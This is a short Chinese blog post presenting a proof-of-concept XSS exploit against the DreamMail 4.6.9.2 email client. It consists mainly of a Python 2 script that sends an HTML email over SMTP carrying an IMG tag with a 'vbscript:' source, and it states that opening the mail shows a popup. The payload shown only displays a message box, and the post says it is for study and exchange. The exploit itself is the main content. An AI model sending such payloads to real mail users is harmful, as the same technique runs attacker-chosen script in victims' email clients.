Dreammail V4.6.9.2 XSS漏洞利用

转载请注明：@小五义http://www.cnblogs.com/xiaowuyi

针对版本： DreamMail 4.6.9.2
测试环境：windows xp sp3

python版本：2.6

测试邮箱：126.com

#-*- coding:UTF-8 -*-

#@小五义 http://www.cnblogs.com/xiaowuyi


import smtplib, urllib2
 
payload = '''<IMG SRC='vbscript:msgbox("Hello world!")'>'''
 
def sendMail(toemail, smtpsrv, username, password):
        msg  = "From: XXXX@126.com
"
        msg += "To:YYYY@126.com
"
        msg += 'Date: Today
'
        msg += "Subject: XSS payload
"
        msg += "Content-type: text/html

"
        msg += payload + "

"
        server = smtplib.SMTP()
        server.connect(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(username, toemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()
 
username = "XXXX@126.com" #也可使用其它邮件服务器
password = "XXXXX"  #密码
toemail = "YYYY@126.com"
smtpsrv  = "smtp.126.com"
 
print "[*] Sending Email"
sendMail(toemail, smtpsrv, username, password)

发送成功后，当用dreammail浏览该邮件时，会弹窗提示，如下：

该博文仅供学习交流。